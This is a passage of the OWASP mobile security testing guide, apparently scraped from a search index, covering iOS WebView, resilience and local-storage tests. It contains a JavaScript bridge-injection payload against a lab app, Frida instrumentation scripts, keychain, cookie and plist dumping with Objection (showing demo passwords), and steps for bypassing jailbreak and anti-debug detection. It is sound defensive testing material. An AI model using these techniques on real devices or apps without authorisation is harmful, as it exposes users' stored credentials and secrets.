"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0077/#checking-telephone-number-detection","title":"Checking Telephone Number Detection","text":"In Safari on iOS, telephone number detection is on by default. However, you might want to turn it off if your HTML page contains numbers that can be interpreted as phone numbers, but are not phone numbers, or to prevent the DOM document from being modified when parsed by the browser. To turn off telephone number detection in Safari on iOS, use the format-detection meta tag (<meta name = \"format-detection\" content = \"telephone=no\">
). An example of this can be found in the Apple developer documentation. Phone links should be then used (e.g. <a href=\"tel:1-408-555-5555\">1-408-555-5555</a>
) to explicitly create a link.
If it's possible to load local files via a WebView, the app might be vulnerable to directory traversal attacks. This would allow access to all files within the sandbox or even to escape the sandbox with full access to the file system (if the device is jailbroken). It should therefore be verified if a user can change the filename or path from which the file is loaded, and they shouldn't be able to edit the loaded file.
To simulate an attack, you may inject your own JavaScript into the WebView with an interception proxy or simply by using dynamic instrumentation. Attempt to access local storage and any native methods and properties that might be exposed to the JavaScript context.
In a real-world scenario, JavaScript can only be injected through a permanent backend Cross-Site Scripting vulnerability or a MITM attack. See the OWASP XSS Prevention Cheat Sheet and the chapter \"iOS Network Communication\" for more information.
For what concerns this section we will learn about:
As we have seen above in \"Testing How WebViews are Loaded\", if \"scenario 2\" of the WKWebViews is loaded, the app will do so by calling URLForResource:withExtension:
and loadHTMLString:baseURL
.
To quickly inspect this, you can use frida-trace and trace all \"loadHTMLString\" and \"URLForResource:withExtension:\" methods.
$ frida-trace -U \"Where's My Browser?\"\n -m \"*[WKWebView *loadHTMLString*]\" -m \"*[* URLForResource:withExtension:]\"\n\n 14131 ms -[NSBundle URLForResource:0x1c0255390 withExtension:0x0]\n 14131 ms URLForResource: web/WKWebView/scenario2.html\n 14131 ms withExtension: 0x0\n 14190 ms -[WKWebView loadHTMLString:0x1c0255390 baseURL:0x0]\n 14190 ms HTMLString: <!DOCTYPE html>\n <html>\n ...\n </html>\n\n 14190 ms baseURL: nil\n
In this case, baseURL
is set to nil
, meaning that the effective origin is \"null\". You can obtain the effective origin by running window.origin
from the JavaScript of the page (this app has an exploitation helper that allows to write and run JavaScript, but you could also implement a MITM or simply use Frida to inject JavaScript, e.g. via evaluateJavaScript:completionHandler
of WKWebView
).
As an additional note regarding UIWebView
s, if you retrieve the effective origin from a UIWebView
where baseURL
is also set to nil
you will see that it is not set to \"null\", instead you'll obtain something similar to the following:
applewebdata://5361016c-f4a0-4305-816b-65411fc1d780\n
This origin \"applewebdata://\" is similar to the \"file://\" origin as it does not implement Same-Origin Policy and allow access to local files and any web resources. In this case, it would be better to set baseURL
to \"about:blank\", this way, the Same-Origin Policy would prevent cross-origin access. However, the recommendation here is to completely avoid using UIWebView
s and go for WKWebView
s instead.
Even if not having the original source code, you can quickly determine if the app's WebViews do allow file access and which kind. For this, simply navigate to the target WebView in the app and inspect all its instances, for each of them get the values mentioned in the static analysis, that is, allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
. This only applies to WKWebView
s (UIWebVIew
s always allow file access).
We continue with our example using the \"Where's My Browser?\" app and Frida REPL, extend the script with the following content:
ObjC.choose(ObjC.classes['WKWebView'], {\n onMatch: function (wk) {\n console.log('onMatch: ', wk);\n console.log('URL: ', wk.URL().toString());\n console.log('javaScriptEnabled: ', wk.configuration().preferences().javaScriptEnabled());\n console.log('allowFileAccessFromFileURLs: ',\n wk.configuration().preferences().valueForKey_('allowFileAccessFromFileURLs').toString());\n console.log('hasOnlySecureContent: ', wk.hasOnlySecureContent().toString());\n console.log('allowUniversalAccessFromFileURLs: ',\n wk.configuration().valueForKey_('allowUniversalAccessFromFileURLs').toString());\n },\n onComplete: function () {\n console.log('done for WKWebView!');\n }\n});\n
If you run it now, you'll have all the information you need:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n\nonMatch: <WKWebView: 0x1508b1200; frame = (0 0; 320 393); layer = <CALayer: 0x1c4238f20>>\nURL: file:///var/mobile/Containers/Data/Application/A654D169-1DB7-429C-9DB9-A871389A8BAA/\n Library/WKWebView/scenario1.html\njavaScriptEnabled: true\nallowFileAccessFromFileURLs: 0\nhasOnlySecureContent: false\nallowUniversalAccessFromFileURLs: 0\n
Both allowFileAccessFromFileURLs
and allowUniversalAccessFromFileURLs
are set to \"0\", meaning that they are disabled. In this app we can go to the WebView configuration and enable allowFileAccessFromFileURLs
. If we do so and re-run the script we will see how it is set to \"1\" this time:
$ frida -U -f com.authenticationfailure.WheresMyBrowser -l webviews_inspector.js\n...\n\nallowFileAccessFromFileURLs: 1\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/","title":"Determining Whether Native Methods Are Exposed Through WebViews","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-uiwebview-javascript-to-native-bridges","title":"Testing UIWebView JavaScript to Native Bridges","text":"Search for code that maps native objects to the JSContext
associated with a WebView and analyze what functionality it exposes, for example no sensitive data should be accessible and exposed to WebViews.
In Objective-C, the JSContext
associated with a UIWebView
is obtained as follows:
[webView valueForKeyPath:@\"documentView.webView.mainFrame.javaScriptContext\"]\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#testing-wkwebview-javascript-to-native-bridges","title":"Testing WKWebView JavaScript to Native Bridges","text":"Verify if a JavaScript to native bridge exists by searching for WKScriptMessageHandler
and check all exposed methods. Then verify how the methods are called.
The following example from \"Where's My Browser?\" demonstrates this.
First we see how the JavaScript bridge is enabled:
func enableJavaScriptBridge(_ enabled: Bool) {\n options_dict[\"javaScriptBridge\"]?.value = enabled\n let userContentController = wkWebViewConfiguration.userContentController\n userContentController.removeScriptMessageHandler(forName: \"javaScriptBridge\")\n\n if enabled {\n let javaScriptBridgeMessageHandler = JavaScriptBridgeMessageHandler()\n userContentController.add(javaScriptBridgeMessageHandler, name: \"javaScriptBridge\")\n }\n}\n
Adding a script message handler with name \"name\"
(or \"javaScriptBridge\"
in the example above) causes the JavaScript function window.webkit.messageHandlers.myJavaScriptMessageHandler.postMessage
to be defined in all frames in all web views that use the user content controller. It can be then used from the HTML file like this:
function invokeNativeOperation() {\n value1 = document.getElementById(\"value1\").value\n value2 = document.getElementById(\"value2\").value\n window.webkit.messageHandlers.javaScriptBridge.postMessage([\"multiplyNumbers\", value1, value2]);\n}\n
The called function resides in JavaScriptBridgeMessageHandler.swift
:
class JavaScriptBridgeMessageHandler: NSObject, WKScriptMessageHandler {\n\n//...\n\ncase \"multiplyNumbers\":\n\n let arg1 = Double(messageArray[1])!\n let arg2 = Double(messageArray[2])!\n result = String(arg1 * arg2)\n//...\n\nlet javaScriptCallBack = \"javascriptBridgeCallBack('\\(functionFromJS)','\\(result)')\"\nmessage.webView?.evaluateJavaScript(javaScriptCallBack, completionHandler: nil)\n
The problem here is that the JavaScriptBridgeMessageHandler
not only contains that function, it also exposes a sensitive function:
case \"getSecret\":\n result = \"XSRSOGKC342\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0078/#dynamic-analysis","title":"Dynamic Analysis","text":"At this point you've surely identified all potentially interesting WebViews in the iOS app and got an overview of the potential attack surface (via static analysis, the dynamic analysis techniques that we have seen in previous sections or a combination of them). This would include HTML and JavaScript files, usage of the JSContext
/ JSExport
for UIWebView
and WKScriptMessageHandler
for WKWebView
, as well as which functions are exposed and present in a WebView.
Further dynamic analysis can help you exploit those functions and get sensitive data that they might be exposing. As we have seen in the static analysis, in the previous example it was trivial to get the secret value by performing reverse engineering (the secret value was found in plain text inside the source code) but imagine that the exposed function retrieves the secret from secure storage. In this case, only dynamic analysis and exploitation would help.
The procedure for exploiting the functions starts with producing a JavaScript payload and injecting it into the file that the app is requesting. The injection can be accomplished via various techniques, for example:
stringByEvaluatingJavaScriptFromString:
for UIWebView
and evaluateJavaScript:completionHandler:
for WKWebView
).In order to get the secret from the previous example of the \"Where's My Browser?\" app, you can use one of these techniques to inject the following payload that will reveal the secret by writing it to the \"result\" field of the WebView:
function javascriptBridgeCallBack(name, value) {\n document.getElementById(\"result\").innerHTML=value;\n};\nwindow.webkit.messageHandlers.javaScriptBridge.postMessage([\"getSecret\"]);\n
Of course, you may also use the Exploitation Helper it provides:
See another example for a vulnerable iOS app and function that is exposed to a WebView in [#thiel2] page 156.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/","title":"Making Sure that the App Is Properly Signed","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0081/#static-analysis","title":"Static Analysis","text":"You have to ensure that the app is using the latest code signature format. You can retrieve the signing certificate information from the application's .app file with codesign. Codesign is used to create, check, and display code signatures, as well as inquire into the dynamic status of signed code in the system.
After you get the application's IPA file, re-save it as a ZIP file and decompress the ZIP file. Navigate to the Payload directory, where the application's .app file will be.
Execute the following codesign
command to display the signing information:
$ codesign -dvvv YOURAPP.app\nExecutable=/Users/Documents/YOURAPP/Payload/YOURAPP.app/YOURNAME\nIdentifier=com.example.example\nFormat=app bundle with Mach-O universal (armv7 arm64)\nCodeDirectory v=20200 size=154808 flags=0x0(none) hashes=4830+5 location=embedded\nHash type=sha256 size=32\nCandidateCDHash sha1=455758418a5f6a878bb8fdb709ccfca52c0b5b9e\nCandidateCDHash sha256=fd44efd7d03fb03563b90037f92b6ffff3270c46\nHash choices=sha1,sha256\nCDHash=fd44efd7d03fb03563b90037f92b6ffff3270c46\nSignature size=4678\nAuthority=iPhone Distribution: Example Ltd\nAuthority=Apple Worldwide Developer Relations Certification Authority\nAuthority=Apple Root CA\nSigned Time=4 Aug 2017, 12:42:52\nInfo.plist entries=66\nTeamIdentifier=8LAMR92KJ8\nSealed Resources version=2 rules=12 files=1410\nInternal requirements count=1 size=176\n
There are various ways to distribute your app as described at the Apple documentation, which include using the App Store or via Apple Business Manager for custom or in-house distribution. In case of an in-house distribution scheme, make sure that no ad hoc certificates are used when the app is signed for distribution.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/","title":"Testing whether the App is Debuggable","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#static-analysis","title":"Static Analysis","text":"Inspect the app entitlements and check the value of get-task-allow
key. If it is set to true
, the app is debuggable.
Using codesign:
$ codesign -d --entitlements - iGoat-Swift.app\n\nExecutable=/Users/owasp/iGoat-Swift/Payload/iGoat-Swift.app/iGoat-Swift\n[Dict]\n [Key] application-identifier\n [Value]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n [Key] com.apple.developer.team-identifier\n [Value]\n [String] TNAJ496RHB\n [Key] get-task-allow\n [Value]\n [Bool] true\n [Key] keychain-access-groups\n [Value]\n [Array]\n [String] TNAJ496RHB.OWASP.iGoat-Swift\n````\n\nUsing ldid:\n\n```xml\n$ ldid -e iGoat-Swift.app/iGoat-Swift\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n <key>com.apple.developer.team-identifier</key>\n <string>TNAJ496RHB</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>TNAJ496RHB.OWASP.iGoat-Swift</string>\n </array>\n</dict>\n</plist>\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0082/#dynamic-analysis","title":"Dynamic Analysis","text":"Check whether you can attach a debugger directly, using Xcode. Next, check if you can debug the app on a jailbroken device after Clutching it. This is done using the debug-server which comes from the BigBoss repository at Cydia.
Note: if the application is equipped with anti-reverse engineering controls, then the debugger can be detected and stopped.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/","title":"Testing for Debugging Symbols","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0083/#static-analysis","title":"Static Analysis","text":"To verify the existence of debug symbols you can use objdump from binutils or llvm-objdump to inspect all of the app binaries.
In the following snippet we run objdump over TargetApp
(the iOS main app executable) to show the typical output of a binary containing debug symbols which are marked with the d
(debug) flag. Check the objdump man page for information about various other symbol flag characters.
$ objdump --syms TargetApp\n\n0000000100007dc8 l d *UND* -[ViewController handleSubmitButton:]\n000000010000809c l d *UND* -[ViewController touchesBegan:withEvent:]\n0000000100008158 l d *UND* -[ViewController viewDidLoad]\n...\n000000010000916c l d *UND* _disable_gdb\n00000001000091d8 l d *UND* _detect_injected_dylds\n00000001000092a4 l d *UND* _isDebugged\n...\n
To prevent the inclusion of debug symbols, set Strip Debug Symbols During Copy
to YES
via the XCode project's build settings. Stripping debugging symbols will not only reduce the size of the binary but also increase the difficulty of reverse engineering.
Dynamic analysis is not applicable for finding debugging symbols.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/","title":"Testing for Debugging Code and Verbose Error Logging","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#static-analysis","title":"Static Analysis","text":"You can take the following static analysis approach for the logging statements:
NSLog
, println
, print
, dump
, debugPrint
.#ifdef DEBUG\n // Debug-only code\n#endif\n
The procedure for enabling this behavior in Swift has changed: you need to either set environment variables in your scheme or set them as custom flags in the target's build settings. Please note that the following functions (which allow you to determine whether the app was built in the Swift 2.1. release-configuration) aren't recommended, as Xcode 8 and Swift 3 don't support these functions:
_isDebugAssertConfiguration
_isReleaseAssertConfiguration
_isFastAssertConfiguration
.Depending on the application's setup, there may be more logging functions. For example, when CocoaLumberjack is used, static analysis is a bit different.
For the \"debug-management\" code (which is built-in): inspect the storyboards to see whether there are any flows and/or view-controllers that provide functionality different from the functionality the application should support. This functionality can be anything from debug views to printed error messages, from custom stub-response configurations to logs written to files on the application's file system or a remote server.
As a developer, incorporating debug statements into your application's debug version should not be a problem as long as you make sure that the debug statements are never present in the application's release version.
In Objective-C, developers can use preprocessor macros to filter out debug code:
#ifdef DEBUG\n // Debug-only code\n#endif\n
In Swift 2 (with Xcode 7), you have to set custom compiler flags for every target, and compiler flags have to start with \"-D\". So you can use the following annotations when the debug flag DMSTG-DEBUG
is set:
#if MSTG-DEBUG\n // Debug-only code\n#endif\n
In Swift 3 (with Xcode 8), you can set Active Compilation Conditions in Build settings/Swift compiler - Custom flags. Instead of a preprocessor, Swift 3 uses conditional compilation blocks based on the defined conditions:
#if DEBUG_LOGGING\n // Debug-only code\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0084/#dynamic-analysis","title":"Dynamic Analysis","text":"Dynamic analysis should be executed on both a simulator and a device because developers sometimes use target-based functions (instead of functions based on a release/debug-mode) to execute the debugging code.
For the other \"manager-based\" debug code: click through the application on both a simulator and a device to see if you can find any functionality that allows an app's profiles to be pre-set, allows the actual server to be selected or allows responses from the API to be selected.
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/","title":"Testing Jailbreak Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0088/#overview","title":"Overview","text":"To test for jailbreak detection install the app on a jailbroken device.
Launch the app and see what happens:
If it implements jailbreak detection, you might notice one of the following things:
Note that crashes might be an indicator of jailbreak detection but the app may be crashing for any other reasons, e.g. it may have a bug. We recommend to test the app on non-jailbroken device first, especially when you're testing preproduction versions.
Launch the app and try to bypass Jailbreak Detection using an automated tool:
If it implements jailbreak detection, you might be able to see indicators of that in the output of the tool. See section \"Automated Jailbreak Detection Bypass\".
Reverse Engineer the app:
The app might be using techniques that are not implemented in the automated tools that you've used. If that's the case you must reverse engineer the app to find proofs. See section \"Manual Jailbreak Detection Bypass\".
"},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/","title":"Testing Anti-Debugging Detection","text":""},{"location":"MASTG/tests/ios/MASVS-RESILIENCE/MASTG-TEST-0089/#overview","title":"Overview","text":"In order to test for anti-debugging detection you can try to attach a debugger to the app and see what happens.
The app should respond in some way. For example by:
Try to hook or reverse engineer the app using the methods from section \"Anti-Debugging Detection\".
Next, work on bypassing the detection and answer the following questions:
Application Source Code Integrity Checks:
Run the app on the device in an unmodified state and make sure that everything works. Then apply patches to the executable using optool, re-sign the app as described in the chapter \"iOS Tampering and Reverse Engineering\", and run it.
The app should respond in some way. For example by:
Work on bypassing the defenses and answer the following questions:
File Storage Integrity Checks:
Go to the app data directories as indicated in section \"Accessing App Data Directories\" and modify some files.
Next, work on bypassing the defenses and answer the following questions:
Launch the app with various reverse engineering tools and frameworks installed on your test device, such as Frida, Cydia Substrate, Cycript or SSL Kill Switch.
The app should respond in some way to the presence of those tools. For example by:
Next, work on bypassing the detection of the reverse engineering tools and answer the following questions:
In order to test for emulator detection you can try to run the app on different emulators as indicated in section \"Emulator Detection\" and see what happens.
The app should respond in some way. For example by:
You can also reverse engineer the app using ideas for strings and methods from section \"Emulator Detection\".
Next, work on bypassing this detection and answer the following questions:
Attempt to disassemble the Mach-O in the IPA and any included library files in the \"Frameworks\" directory (.dylib or .framework files), and perform static analysis. At the very least, the app's core functionality (i.e., the functionality meant to be obfuscated) shouldn't be easily discerned. Verify that:
For a more detailed assessment, you need a detailed understanding of the relevant threats and the obfuscation methods used.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/","title":"Testing Local Data Storage","text":""},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#overview","title":"Overview","text":"This test case focuses on identifying potentially sensitive data stored by an application and verifying if it is securely stored. The following checks should be performed:
NSUserDefaults
, databases, KeyChain, Internal Storage, External Storage, etc.NOTE: For MASVS L1 compliance, it is sufficient to store data unencrypted in the application's internal storage directory (sandbox). For L2 compliance, additional encryption is required using cryptographic keys securely managed in the iOS KeyChain. This includes using envelope encryption (DEK+KEK) or equivalent methods.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#static-analysis","title":"Static Analysis","text":"When you have access to the source code of an iOS app, identify sensitive data that's saved and processed throughout the app. This includes passwords, secret keys, and personally identifiable information (PII), but it may as well include other data identified as sensitive by industry regulations, laws, and company policies. Look for this data being saved via any of the local storage APIs listed below.
Make sure that sensitive data is never stored without appropriate protection. For example, authentication tokens should not be saved in NSUserDefaults
without additional encryption. Also avoid storing encryption keys in .plist
files, hardcoded as strings in code, or generated using a predictable obfuscation function or key derivation function based on stable attributes.
Sensitive data should be stored by using the Keychain API (that stores them inside the Secure Enclave), or stored encrypted using envelope encryption. Envelope encryption, or key wrapping, is a cryptographic construct that uses symmetric encryption to encapsulate key material. Data encryption keys (DEK) can be encrypted with key encryption keys (KEK) which must be securely stored in the Keychain. Encrypted DEK can be stored in NSUserDefaults
or written in files. When required, application reads KEK, then decrypts DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
The encryption must be implemented so that the secret key is stored in the Keychain with secure settings, ideally kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
. This ensures the usage of hardware-backed storage mechanisms. Make sure that the AccessControlFlags
are set according to the security policy of the keys in the KeyChain.
Generic examples of using the KeyChain to store, update, and delete data can be found in the official Apple documentation. The official Apple documentation also includes an example of using Touch ID and passcode protected keys.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#filesystem","title":"Filesystem","text":"Using the source code, examine the different APIs used to store data locally. Make sure that any data is properly encrypted based on its sensitivity.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis","title":"Dynamic Analysis","text":"One way to determine whether sensitive information (like credentials and keys) is stored insecurely without leveraging native iOS functions is to analyze the app's data directory. Triggering all app functionality before the data is analyzed is important because the app may store sensitive data only after specific functionality has been triggered. You can then perform static analysis for the data dump according to generic keywords and app-specific data.
The following steps can be used to determine how the application stores data locally on a jailbroken iOS device:
/var/mobile/Containers/Data/Application/$APP_ID/
grep -iRn \"USERID\"
.You can analyze the app's data directory on a non-jailbroken iOS device by using third-party applications, such as iMazing.
$APP_NAME.imazing
. Rename it to $APP_NAME.zip
.Note that tools like iMazing don't copy data directly from the device. They try to extract data from the backups they create. Therefore, getting all the app data that's stored on the iOS device is impossible: not all folders are included in backups. Use a jailbroken device or repackage the app with Frida and use a tool like objection to access all the data and files.
If you added the Frida library to the app and repackaged it as described in \"Dynamic Analysis on Non-Jailbroken Devices\" (from the \"Tampering and Reverse Engineering on iOS\" chapter), you can use objection to transfer files directly from the app's data directory or read files in objection as explained in the chapter \"Basic Security Testing on iOS\", section \"Host-Device Data Transfer\".
The Keychain contents can be dumped during dynamic analysis. On a jailbroken device, you can use Keychain dumper as described in the chapter \"Basic Security Testing on iOS\".
The path to the Keychain file is
/private/var/Keychains/keychain-2.db\n
On a non-jailbroken device, you can use objection to dump the Keychain items created and stored by the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-xcode-and-ios-simulator","title":"Dynamic Analysis with Xcode and iOS simulator","text":"This test is only available on macOS, as Xcode and the iOS simulator is needed.
For testing the local storage and verifying what data is stored within it, it's not mandatory to have an iOS device. With access to the source code and Xcode the app can be build and deployed in the iOS simulator. The file system of the current device of the iOS simulator is available in ~/Library/Developer/CoreSimulator/Devices
.
Once the app is running in the iOS simulator, you can navigate to the directory of the latest simulator started with the following command:
$ cd ~/Library/Developer/CoreSimulator/Devices/$(\nls -alht ~/Library/Developer/CoreSimulator/Devices | head -n 2 |\nawk '{print $9}' | sed -n '1!p')/data/Containers/Data/Application\n
The command above will automatically find the UUID of the latest simulator started. Now you still need to grep for your app name or a keyword in your app. This will show you the UUID of the app.
grep -iRn keyword .\n
Then you can monitor and verify the changes in the filesystem of the app and investigate if any sensitive information is stored within the files while using the app.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#dynamic-analysis-with-objection","title":"Dynamic Analysis with Objection","text":"You can use the objection runtime mobile exploration toolkit to find vulnerabilities caused by the application's data storage mechanism. Objection can be used without a Jailbroken device, but it will require patching the iOS Application.
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#reading-the-keychain","title":"Reading the Keychain","text":"To use Objection to read the Keychain, execute the following command:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios keychain dump\nNote: You may be asked to authenticate using the devices passcode or TouchID\nSave the output by adding `--json keychain.json` to this command\nDumping the iOS keychain...\nCreated Accessible ACL Type Account Service Data\n------------------------- ------------------------------ ----- -------- ------------------------- ------------------------------------------------------------- ------------------------------------\n2020-02-11 13:26:52 +0000 WhenUnlocked None Password keychainValue com.highaltitudehacks.DVIAswiftv2.develop mysecretpass123\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-binary-cookies","title":"Searching for Binary Cookies","text":"iOS applications often store binary cookie files in the application sandbox. Cookies are binary files containing cookie data for application WebViews. You can use objection to convert these files to a JSON format and inspect the data.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json\n[\n {\n \"domain\": \"highaltitudehacks.com\",\n \"expiresDate\": \"2051-09-15 07:46:43 +0000\",\n \"isHTTPOnly\": \"false\",\n \"isSecure\": \"false\",\n \"name\": \"username\",\n \"path\": \"/\",\n \"value\": \"admin123\",\n \"version\": \"0\"\n }\n]\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-property-list-files","title":"Searching for Property List Files","text":"iOS applications often store data in property list (plist) files that are stored in both the application sandbox and the IPA package. Sometimes these files contain sensitive information, such as usernames and passwords; therefore, the contents of these files should be inspected during iOS assessments. Use the ios plist cat plistFileName.plist
command to inspect the plist file.
To find the file userInfo.plist, use the env
command. It will print out the locations of the applications Library, Caches and Documents directories:
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # env\nName Path\n----------------- -------------------------------------------------------------------------------------------\nBundlePath /private/var/containers/Bundle/Application/B2C8E457-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCachesDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Caches\nDocumentDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Documents\nLibraryDirectory /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library\n
Go to the Documents directory and list all files using ls
.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Owner Group Size Creation Name\n------------ ------- ------------------------------------ ------ ------- ------------ ------------ -------- ------------------------- ------------------------\nDirectory 493 n/a True True mobile (501) mobile (501) 192.0 B 2020-02-12 07:03:51 +0000 default.realm.management\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 16.0 KiB 2020-02-12 07:03:51 +0000 default.realm\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 1.2 KiB 2020-02-12 07:03:51 +0000 default.realm.lock\nRegular 420 CompleteUntilFirstUserAuthentication True True mobile (501) mobile (501) 284.0 B 2020-05-29 18:15:23 +0000 userInfo.plist\nUnknown 384 n/a True True mobile (501) mobile (501) 0.0 B 2020-02-12 07:03:51 +0000 default.realm.note\n\nReadable: True Writable: True\n
Execute the ios plist cat
command to inspect the content of userInfo.plist file.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios plist cat userInfo.plist\n{\n password = password123;\n username = userName;\n}\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-sqlite-databases","title":"Searching for SQLite Databases","text":"iOS applications typically use SQLite databases to store data required by the application. Testers should check the data protection values of these files and their contents for sensitive data. Objection contains a module to interact with SQLite databases. It allows to dump the schema, their tables and query the records.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # sqlite connect Model.sqlite\nCaching local copy of database file...\nDownloading /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/264C23B8-07B5-4B5D-8701-C020C301C151/Library/Application Support/Model.sqlite to /var/folders/4m/dsg0mq_17g39g473z0996r7m0000gq/T/tmpdr_7rvxi.sqlite\nValidating SQLite database format\nConnected to SQLite database at: Model.sqlite\n\nSQLite @ Model.sqlite > .tables\n+--------------+\n| name |\n+--------------+\n| ZUSER |\n| Z_METADATA |\n| Z_MODELCACHE |\n| Z_PRIMARYKEY |\n+--------------+\nTime: 0.013s\n\nSQLite @ Model.sqlite > select * from Z_PRIMARYKEY\n+-------+--------+---------+-------+\n| Z_ENT | Z_NAME | Z_SUPER | Z_MAX |\n+-------+--------+---------+-------+\n| 1 | User | 0 | 0 |\n+-------+--------+---------+-------+\n1 row in set\nTime: 0.013s\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0052/#searching-for-cache-databases","title":"Searching for Cache Databases","text":"By default NSURLSession stores data, such as HTTP requests and responses in the Cache.db database. This database can contain sensitive data, if tokens, usernames or any other sensitive information has been cached. To find the cached information open the data directory of the app (/var/mobile/Containers/Data/Application/<UUID>
) and go to /Library/Caches/<Bundle Identifier>
. The WebKit cache is also being stored in the Cache.db file. Objection can open and interact with the database with the command sqlite connect Cache.db
, as it is a normal SQLite database.
It is recommended to disable Caching this data, as it may contain sensitive information in the request or response. The following list below shows different ways of achieving this:
removeAllCachedResponses
You can call this method as follows:URLCache.shared.removeAllCachedResponses()
This method will remove all cached requests and responses from Cache.db file.
Apple documentation:
An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesn\u2019t store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.
Use the following keywords to check the app's source code for predefined and custom logging statements:
A generalized approach to this issue is to use a define to enable NSLog
statements for development and debugging, then disable them before shipping the software. You can do this by adding the following code to the appropriate PREFIX_HEADER (*.pch) file:
#ifdef DEBUG\n# define NSLog (...) NSLog(__VA_ARGS__)\n#else\n# define NSLog (...)\n#endif\n
"},{"location":"MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0053/#dynamic-analysis","title":"Dynamic Analysis","text":"In the section \"Monitoring System Logs\" of the chapter \"iOS Basic Security Testing\" various methods for checking the device logs are explained. Navigate to a screen that displays input fields that take sensitive user information.
After starting one of the methods, fill in the input fields. If sensitive data is displayed in the output, the app fails this test.
